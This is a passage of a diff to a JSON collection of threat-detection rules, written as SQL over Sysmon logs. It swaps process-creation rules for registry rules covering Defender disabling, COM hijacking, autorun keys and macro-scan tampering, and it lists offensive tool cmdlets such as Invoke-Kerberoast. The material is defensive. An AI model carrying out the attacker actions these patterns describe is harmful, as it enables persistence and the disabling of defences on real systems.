"filename": "proc_creation_win_lolbin_kavremover.yml" + "filename": "registry_set_policies_associations_tamper.yml" }, { - "title": "Execute Code with Pester.bat", - "id": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", - "status": "test", - "description": "Detects code execution via Pester.bat (Pester - Powershell 
Modulte for testing)", - "author": "Julia Fomina, oscd.community", + "title": "Winlogon AllowMultipleTSSessions Enable", + "id": "f7997770-92c3-4ec9-b112-774c4ef96f96", + "status": "experimental", + "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", + "attack.persistence", "attack.defense_evasion", - "attack.t1216" + "attack.t1112" ], "falsepositives": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" + "Legitimate use of the multi session functionality" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Pester%' ESCAPE '\\' AND CommandLine LIKE '%Get-Help%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%pester%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\' AND (CommandLine LIKE '%help%' ESCAPE '\\' OR CommandLine LIKE '%_%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AllowMultipleTSSessions' ESCAPE '\\' AND Details LIKE '%DWORD (0x00000001)' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pester_1.yml" + "filename": "registry_set_winlogon_allow_multiple_tssessions.yml" }, { - "title": "PUA - Wsudo Suspicious Execution", - "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "title": "Custom File Open Handler Executes PowerShell", + "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "status": 
"experimental", - "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the abuse of custom file open handler, executing powershell", + "author": "CD_R0M_", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1059" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentImage LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\' AND Details LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" }, { - "title": "HackTool - SharpView Execution", - "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "title": "Wow6432Node Classes Autorun Keys Modification", + "id": "18f2065c-d36c-464a-a748-bcf909acb2e3", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "tags": [ + 
"attack.persistence", + "attack.t1547.001" + ], + "falsepositives": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" + ], + "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml" + }, + { + "title": "Registry Persitence via Service in Safe Mode", + "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "description": 
"Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'SharpView.exe' OR Image LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' 
OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine 
LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND Details = 'Service') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_sharpview.yml" + "filename": "registry_set_add_load_service_in_safe_mode.yml" }, { - "title": "UEFI Persistence Via Wpbbin - ProcessCreation", - "id": 
"4abc0ec4-db5a-412f-9632-26659cddf145", + "title": "Disable Macro Runtime Scan Scope", + "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "status": "experimental", - "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_wpbbin_potential_persistence.yml" + "filename": "registry_set_disable_macroruntimescanscope.yml" }, { - "title": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", - "id": "43103702-5886-11ed-9b6a-0242ac120002", + "title": "Windows Defender Service Disabled", + "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", "status": "experimental", - "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", - "author": "bohops", + "description": "Detects when an attacker or tool disables the Windows Defender service 
(WinDefend) via the registry", + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "False positives depend on custom use of vsls-agent.exe" + "Administrator actions" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\vsls-agent.exe' ESCAPE '\\' AND CommandLine LIKE '%--agentExtensionPath%' ESCAPE '\\') AND NOT (CommandLine LIKE '%Microsoft.VisualStudio.LiveShare.Agent.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND Details = 'DWORD (0x00000004)')" ], - "filename": "proc_creation_win_vslsagent_agentextensionpath_load.yml" + "filename": "registry_set_disable_windows_defender_service.yml" }, { - "title": "New Root Certificate Installed Via CertMgr.EXE", - "id": "ff992eac-6449-4c60-8c1d-91c9722a1d48", + "title": "Suspicious Printer Driver Empty Manufacturer", + "id": "e0813366-0407-449a-9869-a2db1119dc41", "status": "test", - "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CertMgr.exe' ESCAPE '\\' OR OriginalFileName = 'CERTMGT.EXE') AND (CommandLine LIKE '%/add%' ESCAPE '\\' AND CommandLine LIKE '%root%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND Details = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certmgr_certificate_installation.yml" + "filename": "registry_set_susp_printer_driver.yml" }, { - "title": "Ie4uinit Lolbin Use From Invalid Path", - "id": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", + "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", + "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", "status": "experimental", - "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", - "author": "frack113", + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "ViberPC updater calls this binary with the following 
commandline \"ie4uinit.exe -ClearIconCache\"" + "Probable legitimate applications. If you find these please add them to an exclusion list" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ie4uinit.exe' ESCAPE '\\' OR OriginalFileName = 'IE4UINIT.EXE') AND NOT (((CurrentDirectory LIKE 'c:\\\\windows\\\\system32\\\\' ESCAPE '\\' OR CurrentDirectory LIKE 'c:\\\\windows\\\\sysWOW64\\\\' ESCAPE '\\')) OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%\\%appdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ie4uinit.yml" + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" }, { - "title": "Use of Pcalua For Execution", - "id": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", + "title": "Potential PowerShell Execution Policy Tampering", + "id": 
"fad91067-08c5-4d1a-8d8c-d96a21b37814", "status": "experimental", - "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", - "author": "Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use by a via a batch script or by an administrator." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' AND CommandLine LIKE '% -a%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy' ESCAPE '\\') AND (Details LIKE '%Bypass%' ESCAPE '\\' OR Details LIKE '%RemoteSigned%' ESCAPE '\\' OR Details LIKE '%Unrestricted%' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_pcalua.yml" + "filename": "registry_set_powershell_execution_policy.yml" }, { - "title": "Suspicious PowerShell Command Line", - "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", - "status": "test", - "description": "Detects the PowerShell command lines with special characters", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton 
(fp)", + "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", + "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "status": "experimental", + "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Unlikely", - "Amazon SSM Document Worker", - "Windows Defender ATP" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT (ParentImage LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*' AND (CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR 
CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" + "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" }, { - "title": "Potential UAC Bypass Via Sdclt.EXE", - "id": "40f9af16-589d-4984-b78d-8c2aec023197", - "status": "test", - "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Wow6432Node CurrentVersion Autorun Keys Modification", + "id": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%sdclt.exe' ESCAPE '\\' AND IntegrityLevel = 'High')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 
'%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Image LIKE '%C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND Image LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft 